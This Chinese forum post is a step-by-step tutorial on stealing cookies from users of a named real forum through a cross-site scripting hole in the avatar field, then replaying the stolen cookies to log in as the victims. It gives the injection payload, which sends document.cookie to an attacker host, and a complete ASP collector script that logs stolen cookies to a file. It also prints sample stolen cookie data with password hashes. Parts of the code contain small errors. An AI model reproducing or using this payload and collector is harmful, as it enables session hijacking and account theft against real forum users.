返回列表 发帖

关于跨站脚本攻击和cookie 欺骗的简单运用

我来给大家详细说明一下什么是cookie 欺骗,下面我用www.8da.cc 这个论坛做试验 此论坛用的是Discuz! 2.0 的php 论坛,存在严重的漏洞。 什么是cookie 呢。其实很简单。我们可以把cookie 看成是一个私人抽屉,里面放的都是一些你的私人文件,每一个需要cookie 的网站都会在你的硬盘上设置一个属于该网站的私人抽屉。以便你下次再访问该网站的时候,可以节省时间。 我们既然需要cookie 欺骗,那么当然首先要得到用户放在自己硬盘上的cookie 文件。如何得到呢,可以通过一些 攻击脚本去偷取。。8da.cc 这个星际论坛,对于用户定义的头像,没有做任何过滤和验证,我们可以从头像入手,把攻击脚本嵌在自己的头像里面。 更改自己的基础资料,在选择头像的时候,填入如下代码: javascript:window.open('http://www.xxxxx.com/test.asp?'+document..cookie) http://www.xxxxx.com/test.asp 这个文件的作用就是把收集来的cookie 写入一个文本文件。具体代码,我在后面付上。 然后去随便发个帖子,^_^,最后名字取得有点轰动效应的。保证看的人多。这样 每个看到你头像的人,都不自觉的 打开了 http://www.xxxxx.com/test.asp 这个页面。然后他的cookie 就被你记录到了一个文本文件里面。 收集到的资料格式如下: 1065671488; bbuserid=8489; bbpassword=fe055d7ebdd990d62cf3274aded3deec; _discuz_styleid=7; oldtopics= 104403 23222 104401 104363 104321 104399 104349 _cookietime=2592000; lastvisit=1068797580; TZ1=0; TZ2=3; _discuz_user=V`shadow.hattie; _discuz_pw=fe055d7ebdd990d62cf3274aded3deec; sid=owXVgKR6 大多数都是垃圾代码,只有2 条有用。 _discuz_user=xxxxxxx _discuz_pw=fe055d7ebdd990d62cf3274aded3deec; 呵呵,一条是用户名,一条是密码,^_^,当然密码是经过md5 加密的,不能直接拿来用。 到目前为止,我们已经完成了跨站脚本攻击的全部过程。。下面。。开始进行cookie 欺骗。 去网络上面随便下载一个cookie 查看器。我用的是 iecv1.5???????.exe 打开搜索www.8da.cc 呵呵,看到了什么,你自己的cookie 。里面也有两条: _discuz_user=yyyyyyy _discuz_pw=fe055d7ebdd990d62cf3274aded3d324 下面就是楼主所谓的高难度 ,需要较专业知识,对普通用户不太合适的 cookie 欺骗技术的具体实施 把你收集到的 _discuz_user和 _discuz_pw 替换你原来保存的cookie 。ok。选择重新打开网站。。你看到了什么。哈哈,你用你收集来的帐号已经成功登陆了。^_^。over。这就是cookie欺骗技术。。。 付上 test.asp 文件的具体代码,cookies.txt 和 test.asp 都放在你自己的空间的同一层目录里面。然后定期去看 cookies.txt 就能每天收获一大堆的用户名和id。。 <% testfile=Server.MapPath("cookies.txt") msg=Request.QueryString("bblastvisit")&"
" set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg& "") thisfile.close set fs = nothing %> 呵呵,如果你能把我发的内容照着做一边,那么你就是cookie 欺骗高手了。

返回列表 回复 发帖